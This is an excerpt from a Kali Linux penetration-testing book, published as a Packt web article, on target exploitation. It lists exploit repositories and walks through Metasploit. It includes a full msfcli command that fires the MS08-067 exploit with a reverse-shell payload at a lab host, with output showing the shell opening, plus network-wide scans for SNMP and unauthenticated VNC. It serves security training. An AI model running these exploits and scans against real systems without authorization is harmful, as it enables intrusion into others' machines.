Target Exploitation

Exclusive offer: get 50% off this eBook here
Kali Linux – Assuring Security by Penetration Testing

Kali Linux – Assuring Security by Penetration Testing — Save 50%

Master the art of penetration testing with Kali Linux with this book and ebook

$26.99    $13.50
by Lee Allen Shakeel Ali Tedi Heriyanto | March 2014 | Open Source

This article is written by Tedi Heriyanto, Lee Allen, and Shakeel Ali, the authors of Kali Linux – Assuring Security by Penetration Testing. Target exploitation is one area that sets a penetration test apart from a vulnerability assessment. Now that vulnerabilities have been found, you will actually validate and take advantage of these vulnerabilities by exploiting the system in the hope of gaining full control or additional information and visibility into the targeted network and the systems therein. This article will highlight and discuss practices and tools that are used to conduct a real-world exploitation.

(For more resources related to this topic, see here.)

Vulnerability research

Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, neither is it a one-click task. Thus, it requires a strong knowledge base with different factors to carry out security analysis. The following are the factors to carry out security analysis:

  • Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist with any programming language should grant the tester with an imperative advantage of finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts are implementable in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing an exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/.
  • Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in the electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce a code from a given system without any prior knowledge of its internal working, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills such as the removal of copyright protection from a software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring the sensitive data. Reverse engineering adds two layers of concept to examine the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or manually study the source in order to extract the conditions where vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate the assembly code from a complied binary program, while decompilers generate a high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires a careful assessment.
  • Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present under Kali Linux. To keep a track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools.
  • Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process.

Depending on the type and classification of vulnerability discovered, it is very significant to follow the specific strategy that may allow you to execute an arbitrary code or command on the target system. As a professional penetration tester, you may always be looking for loopholes that should result in getting a shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques.

Vulnerability and exploit repositories

For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with the PoC exploit code to prove the feasibility and viability of a vulnerability found in the specific software or application. And, many still remain unaddressed. This competitive era of finding the publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture) provided that you hold intermediate programming skills and a clear understanding of OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them.

Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors.

The following is a list of online repositories:

Repository name

Website URL

Bugtraq SecurityFocus

http://www.securityfocus.com

OSVDB Vulnerabilities

http://osvdb.org

Packet Storm

http://www.packetstormsecurity.org

VUPEN Security

http://www.vupen.com

National Vulnerability Database

http://nvd.nist.gov

ISS X-Force

http://xforce.iss.net

US-CERT Vulnerability Notes

http://www.kb.cert.org/vuls

US-CERT Alerts

http://www.us-cert.gov/cas/techalerts/

SecuriTeam

http://www.securiteam.com

Government Security Org

http://www.governmentsecurity.org

Secunia Advisories

http://secunia.com/advisories/historic/

Security Reason

http://securityreason.com

XSSed XSS-Vulnerabilities

http://www.xssed.com

Security Vulnerabilities Database

http://securityvulns.com

SEBUG

http://www.sebug.net

BugReport

http://www.bugreport.ir

MediaService Lab

http://lab.mediaservice.net

Intelligent Exploit Aggregation Network

http://www.intelligentexploit.com

Hack0wn

http://www.hack0wn.com

Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integration of exploit database from Offensive Security. This provides an extra advantage of keeping all archived exploits to date on your system for future reference and use. To access Exploit-DB, execute the following commands on your shell:

# cd /usr/share/exploitdb/ # vim files.csv

This will open a complete list of exploits currently available from Exploit-DB under the /pentest/exploits/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful set of compilers and interpreters that support the execution of these exploits.

How to extract particular information from the exploits list?

Using the power of bash commands, you can manipulate the output of any text file in order to retrieve the meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html.

Advanced exploitation toolkit

Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in a greater detail and presented a number of scenarios that would effectively increase the productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization such that it makes it easier for the penetration tester with optimum programming skills to extend or develop custom plugins and tools. The architecture of a framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of modules (exploits, payloads, auxiliaries, encoders, and NOP). Each of the following modules have their own meaning and are function-specific to the penetration testing process.

  • Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system
  • Payload: This module is a malicious code intended as a part of an exploit or independently compiled to run the arbitrary commands on the target system
  • Auxiliaries: These modules are the set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks
  • Encoders: These modules are provided to evade the detection of antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation
  • No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but to cover a consistent payload space

For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to a console version as it supports most of the framework features.

MSFConsole

MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interface for penetration testers to make the best use of the exploitation framework. To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command:

# msfconsole

You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command:

msf > help

This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows:

msf > show -h [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options [*] Additional module-specific parameters are: advanced, evasion, targets, actions

This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following:

  • show auxiliary: This command will display all the auxiliary modules
  • show exploits: This command will get a list of all the exploits within the framework
  • show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits
  • show encoders: This command will print the list of available encoders
  • show nops: This command will display all the available NOP generators
  • show options: This command will display the settings and options available for the specific module
  • show targets: This command will help us to extract a list of target OS supported by a particular exploit module
  • show advanced: This command will provide you with more options to fine-tune your exploit execution

We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you:

Commands

Description

check

To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits.

connect ip port

Works similar to that of Netcat and Telnet tools.

exploit

To launch a selected exploit.

run

To launch a selected auxiliary.

jobs

Lists all the background modules currently running and provides the ability to terminate them.

route add subnet netmask sessionid

To add a route for the traffic through a compromised session for network pivoting purposes.

info module

Displays detailed information about a particular module (exploit, auxiliary, and so on).

set param value

To configure the parameter value within a current module.

setg param value

To set the parameter value globally across the framework to be used by all exploits and auxiliary modules.

unset param

It is a reverse of the set command. You can also reset all variables by using the unset all command at once.

unsetg param

To unset one or more global variables.

sessions

Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination.

search string

Provides a search facility through module names and descriptions.

use module

Select a particular module in the context of penetration testing.

It is important for you to understand their basic use with different sets of modules within the framework.

MSFCLI

Similar to the MSFConsole interface, a command-line interface (CLI) provides an extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole.

To access msfcli, use the terminal to execute the following command:

# msfcli -h

This will display all the available modes similar to that of MSFConsole as well as usage instructions for selecting the particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows:

# msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree...      Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P [*] Please wait while we load the module tree...   Compatible payloads ===================      Name                             Description    ----                             -----------    generic/debug_trap               Generate a debug trap in the target process    generic/shell_bind_tcp           Listen for a connection and spawn a command shell ...

Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)   Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.   C:\WINDOWS\system32>

As you can see, we have acquired a local shell access to our target machine after setting the LHOST parameter for a chosen payload.

Kali Linux – Assuring Security by Penetration Testing Master the art of penetration testing with Kali Linux with this book and ebook
Published: April 2014
eBook Price: $26.99
Book Price: $44.99
See more
Select your format and quantity:

Ninja 101 drills

The examples provided here will clear your understanding of how the exploitation framework can be used in various ways. It is not possible to pump every single aspect or use of the Metasploit framework, but we have carefully examined and extracted the most important features for your drills. To learn and get an in-depth knowledge of the Metasploit framework, we highly recommend that you should read an online tutorial, Metasploit Unleashed, at http://www.offensive-security.com/metasploit-unleashed/. This tutorial has been developed with advanced material that includes insights on exploit development, vulnerability research, and assessment techniques from a penetration testing perspective.

Scenario 1

During this exercise, we will demonstrate how the Metasploit framework can be utilized for port scanning, OS fingerprinting, and service identification using an integrated NMap facility. On your MSFConsole, execute the following commands:

msf > load db_tracker [*] Successfully loaded plugin: db_tracker msf > db_nmap -T Aggressive -sV -n -O -v 192.168.0.7 Starting Nmap 5.00 ( http://nmap.org ) at 2010-11-11 22:34 UTC NSE: Loaded 3 scripts for scanning. Initiating ARP Ping Scan at 22:34 Scanning 192.168.0.7 [1 port] Completed ARP Ping Scan at 22:34, 0.00s elapsed (1 total hosts) Initiating SYN Stealth Scan at 22:34 Scanning 192.168.0.7 [1000 ports] Discovered open port 445/tcp on 192.168.0.7 Discovered open port 135/tcp on 192.168.0.7 Discovered open port 25/tcp on 192.168.0.7 Discovered open port 139/tcp on 192.168.0.7 Discovered open port 3389/tcp on 192.168.0.7 Discovered open port 80/tcp on 192.168.0.7 Discovered open port 443/tcp on 192.168.0.7 Discovered open port 21/tcp on 192.168.0.7 Discovered open port 1025/tcp on 192.168.0.7 Discovered open port 1433/tcp on 192.168.0.7 Completed SYN Stealth Scan at 22:34, 3.04s elapsed (1000 total ports) Initiating Service scan at 22:34 Scanning 10 services on 192.168.0.7 Completed Service scan at 22:35, 15.15s elapsed (10 services on 1 host) Initiating OS detection (try #1) against 192.168.0.7 ... PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 25/tcp open smtp Microsoft ESMTP 6.0.2600.2180 80/tcp open http Microsoft IIS httpd 5.1 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 443/tcp open https? 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open msrpc Microsoft Windows RPC 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM 3389/tcp open microsoft-rdp Microsoft Terminal Service MAC Address: 00:0B:6B:68:19:91 (Wistron Neweb) Device type: general purpose Running: Microsoft Windows 2000|XP|2003 OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2 Network Distance: 1 hop TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: Incremental Service Info: Host: custdesk; OS: Windows ... Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds Raw packets sent: 1026 (45.856KB) | Rcvd: 1024 (42.688KB)

At this point, we have successfully scanned our target and saved the results in our current database session. To list the target and services discovered, you can issue the db_hosts and db_services commands independently. Additionally, if you have already scanned your target using the NMap program separately and saved the result in the XML format, you can import these results into Metasploit using the db_import_nmap_xml command.

Scenario 2

In this example, we will illustrate a few auxiliaries from the Metasploit framework. The key is to understand their importance in the context of the vulnerability analysis process.

SNMP community scanner

This module will perform the Simple Network Management Protocol (SNMP) sweeps against the given range of network addresses using a well-known set of community strings and print the discovered SNMP device information on the screen as follows:

msf > search snmp [*] Searching loaded modules for pattern 'snmp'... Auxiliary ========= Name Disclosure Date Rank Description ---- --------------- ---- ----------- scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module scanner/snmp/community normal SNMP Community Scanner ... msf > use auxiliary/scanner/snmp/community msf auxiliary(community) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address COMMUNITIES /opt/metasploit3/msf3/data/wordlists/snmp.txt no The list of communities that should be attempted per host RHOSTS yes The target address range or CIDR identifier RPORT 161 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(community) > set RHOSTS 10.2.131.0/24 RHOSTS => 10.2.131.0/24 msf auxiliary(community) > set THREADS 3 THREADS => 3 msf auxiliary(community) > set BATCHSIZE 10 BATCHSIZE => 10 msf auxiliary(community) > run [*] >> progress (10.2.131.0-10.2.131.9) 0/170... [*] >> progress (10.2.131.10-10.2.131.19) 0/170... [*] >> progress (10.2.131.20-10.2.131.29) 0/170... [*] Scanned 030 of 256 hosts (011% complete) [*] >> progress (10.2.131.30-10.2.131.39) 0/170... [*] >> progress (10.2.131.40-10.2.131.49) 0/170... [*] >> progress (10.2.131.50-10.2.131.59) 0/170... [*] Scanned 060 of 256 hosts (023% complete) [*] >> progress (10.2.131.60-10.2.131.69) 0/170... [*] >> progress (10.2.131.70-10.2.131.79) 0/170... [*] Scanned 080 of 256 hosts (031% complete) [*] >> progress (10.2.131.80-10.2.131.89) 0/170... [*] >> progress (10.2.131.90-10.2.131.99) 0/170... [*] >> progress (10.2.131.100-10.2.131.109) 0/170... [*] 10.2.131.109 'public' 'HP ETHERNET MULTI-ENVIRONMENT,ROM none,JETDIRECT,JD128,EEPROM V.33.19,CIDATE 12/17/2008' [*] Scanned 110 of 256 hosts (042% complete) ... [*] >> progress (10.2.131.240-10.2.131.249) 0/170... [*] >> progress (10.2.131.250-10.2.131.255) 0/102... [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed

As you can see, we have discovered one SNMP-enabled device with the public community string. Although it enables the read-only access to the device, we can still get valuable information that will be beneficial during the network penetration testing. This information may involve system data, list of running services, network addresses, version and patch levels, and so on.

VNC blank authentication scanner

This module will scan the range of IP addresses for the Virtual Network Computing (VNC) servers that are accessible without any authentication details as follows:

msf > use auxiliary/scanner/vnc/vnc_none_auth msf auxiliary(vnc_none_auth) > show options msf auxiliary(vnc_none_auth) > set RHOSTS 10.4.124.0/24 RHOSTS => 10.4.124.0/24 msf auxiliary(vnc_none_auth) > run [*] 10.4.124.22:5900, VNC server protocol version : "RFB 004.000", not supported! [*] 10.4.124.23:5900, VNC server protocol version : "RFB 004.000", not supported! [*] 10.4.124.25:5900, VNC server protocol version : "RFB 004.000", not supported! [*] Scanned 026 of 256 hosts (010% complete) [*] 10.4.124.26:5900, VNC server protocol version : "RFB 004.000", not supported! [*] 10.4.124.27:5900, VNC server security types supported : None, free access! [*] 10.4.124.28:5900, VNC server security types supported : None, free access! [*] 10.4.124.29:5900, VNC server protocol version : "RFB 004.000", not supported! ... [*] 10.4.124.224:5900, VNC server protocol version : "RFB 004.000", not supported! [*] 10.4.124.225:5900, VNC server protocol version : "RFB 004.000", not supported! [*] 10.4.124.227:5900, VNC server security types supported : None, free access! [*] 10.4.124.228:5900, VNC server protocol version : "RFB 004.000", not supported! [*] 10.4.124.229:5900, VNC server protocol version : "RFB 004.000", not supported! [*] Scanned 231 of 256 hosts (090% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed

Note that we have found a couple of VNC servers accessible without authentication. This attack vector can become a serious threat for system administrators and can trivially invite unwanted guests to your VNC server from the Internet if no authorization controls are enabled.

Summary

In this article, we pointed out several key areas necessary for the process of target exploitation. At the beginning, we provided an overview of vulnerability research that highlights the requirement for a penetration tester to hold necessary knowledge and skills, which in turn become effective for vulnerability assessment. Afterwards, we presented a list of online repositories from where you can reach a number of publicly disclosed vulnerabilities and exploit codes. We also demonstrated the practical use of an advanced exploitation toolkit named the Metasploit framework. The exercises provided are purely designed to explore and understand the target acquisition process through tactical exploitation methods.

Resources for Article:


Further resources on this subject:


Kali Linux – Assuring Security by Penetration Testing Master the art of penetration testing with Kali Linux with this book and ebook
Published: April 2014
eBook Price: $26.99
Book Price: $44.99
See more
Select your format and quantity:

About the Author :


Lee Allen

Lee Allen is currently the Vulnerability Management Program Lead for one of the Fortune 500. Among many other responsibilities, he performs security assessments and penetration testing.

Lee is very passionate and driven about the subject of penetration testing and security research. His journey into the exciting world of security began back in the 80s while visiting BBS's with his trusty Commodore 64 and a room carpeted with 5.25-inch diskettes. Throughout the years, he has continued his attempts at remaining up-to-date with the latest and greatest in the security industry and the community.

He has several industry certifications including the OSWP and has been working in the IT industry for over 15 years. His hobbies and obsessions include validating and reviewing proof of concept exploit code, programming, security research, attending security conferences, discussing technology, writing, 3D Game development, and skiing.

Shakeel Ali

Shakeel Ali is a Security and Risk Management consultant at Fortune 500. Previously, he was the key founder of Cipher Storm Ltd., UK. His expertise in the security industry markedly exceeds the standard number of security assessments, audits, compliance, governance, and forensic projects that he carries out in day-to-day operations. He has also served as a Chief Security Officer at CSS Providers SAL. As a senior security evangelist and having spent endless nights without taking a nap, he provides constant security support to various businesses, educational organizations, and government institutions globally. He is an active, independent researcher who writes various articles and whitepapers and manages a blog at Ethical-Hacker.net. Also, he regularly participates in BugCon Security Conferences held in Mexico, to highlight the best-of-breed cyber security threats and their solutions from practically driven countermeasures.

Tedi Heriyanto

Tedi Heriyanto currently works as a principal consultant in an Indonesian information security company. In his current role, he has been engaged with various penetration testing assignments in Indonesia and other countries. In his previous role, he was engaged with several well-known business institutions across Indonesia and overseas. Tedi has an excellent track record in designing secure network architecture, deploying and managing enterprise-wide security systems, developing information security policies and procedures, performing information security audits and assessments, and providing information security awareness training. In his spare time, he manages to research, learn, and participate in the Indonesian Security Community activities and has a blog http://theriyanto.wordpress.com. He shares his knowledge in the security fi eld by writing several information security books.

Books From Packt


Kali Linux Cookbook
Kali Linux Cookbook

Instant Kali Linux
Instant Kali Linux

Kali Linux Social Engineering
Kali Linux Social Engineering

Metasploit Penetration Testing Cookbook
Metasploit Penetration Testing Cookbook

Web Penetration Testing with Kali Linux
Web Penetration Testing with Kali Linux

Linux Shell Scripting Cookbook
Linux Shell Scripting Cookbook

Yocto for Embedded Linux Development Primer
Yocto for Embedded Linux Development Primer

Linux Utilities Cookbook
Linux Utilities Cookbook


Code Download and Errata
Packt Anytime, Anywhere
Register Books
Print Upgrades
eBook Downloads
Video Support
Contact Us
Awards Voting Nominations Previous Winners
Judges Open Source CMS Hall Of Fame CMS Most Promising Open Source Project Open Source E-Commerce Applications Open Source JavaScript Library Open Source Graphics Software
Resources
Open Source CMS Hall Of Fame CMS Most Promising Open Source Project Open Source E-Commerce Applications Open Source JavaScript Library Open Source Graphics Software